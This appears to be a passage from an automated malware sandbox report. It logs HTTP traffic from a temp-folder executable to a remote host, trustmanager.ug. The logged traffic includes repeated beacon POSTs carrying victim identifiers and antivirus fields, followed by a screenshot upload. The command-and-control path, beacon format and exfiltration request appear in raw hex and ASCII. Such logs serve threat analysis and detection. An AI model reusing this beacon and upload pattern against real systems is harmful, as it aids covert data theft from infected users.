3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.3	49866	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:18.311717987 CEST	18770	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.337644100 CEST	18784	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.337657928 CEST	18784	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.447444916 CEST	18841	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.474488974 CEST	18843	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.474536896 CEST	18843	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.601404905 CEST	18956	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.627193928 CEST	18958	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:18.627223015 CEST	18958	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.707868099 CEST	18959	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5 Host: trustmanager.ug Content-Length: 98665 Cache-Control: no-cache
Aug 23, 2021 02:09:18.708044052 CEST	18960	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 61 32 66 31 34 65 37 61 62 63 37 34 37 63 66 31 32 61 36 32 38 63 31 38 61 31 61 30 31 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------7a2f14e7abc747cf12a628c18a1a01a5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:18.708296061 CEST	18970	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:18.708530903 CEST	18972	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:18.735017061 CEST	18976	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:18.735773087 CEST	18984	OUT	Data Raw: 46 ed b9 97 9a 3c 88 b1 8d b5 c9 2c 34 9c 9b 4f bf f5 f7 b6 ce a8 e2 12 8d 9a fe bf e1 b4 3a cd 4a c3 48 d3 f4 dd 6e e1 b4 a4 5b a8 be c3 19 82 49 a5 22 c6 59 92 43 2a f0 c0 92 a5 47 0c 49 04 60 e7 04 1b de 23 d3 3f b2 fc 25 af 41 0e 88 d6 16 ab Data Ascii: F<,4O:JHn[I"YC*GI`#?%A%r61pm8Zp%?lJu9FP[wk{{A0f,cIw$tk[\<EX<F`0\q,\z<4?1G[5G,l
Aug 23, 2021 02:09:18.735805988 CEST	18990	OUT	Data Raw: 13 14 b8 a5 02 94 0a ab 0a e3 76 d1 b6 9f 8a 31 45 85 71 9b 68 2b 52 6d a3 6d 1c a1 72 22 b4 86 3a 9f 6f a5 26 da 39 47 cc 56 29 4d 29 56 8a 52 14 a9 e4 29 4c a6 52 98 52 ae 14 a6 18 ea 5c 0b 53 2a 14 a8 ca 7b 55 c3 1d 30 a5 66 e0 68 a6 52 68 ea Data Ascii: v1Eqh+Rmmr":o&9GV)M)VR)LRR\S{U0fhRh62TF:4BJc%]1Mfm2-FVMTHJVECE2RTR`{IhisLBACDD'{inf20$#%WpzWv=N@]&x>I
Aug 23, 2021 02:09:18.735821962 CEST	18994	OUT	Data Raw: 78 06 95 e3 ed 5b 49 92 49 20 8a cd e4 75 db be 48 c9 20 7b 60 8a 8f 56 f1 d7 88 b5 98 da 2b 8b f6 8e 16 18 31 40 02 29 1e f8 e4 fe 26 bc 3c 6e 4f 8a c5 54 51 ba 50 5f d6 c7 4e 53 2a 58 1a 72 94 d5 e6 ff 00 23 d0 7c 7f e3 f8 2c ad a6 d2 34 89 84 Data Ascii: x[II uH {`V+1@)&<nOTQP_NS*Xr#\|,4L"!P+`)`{:714qRRB>4N$cx/mNr\'t#WO&/hM,}Gzm2N<iKu
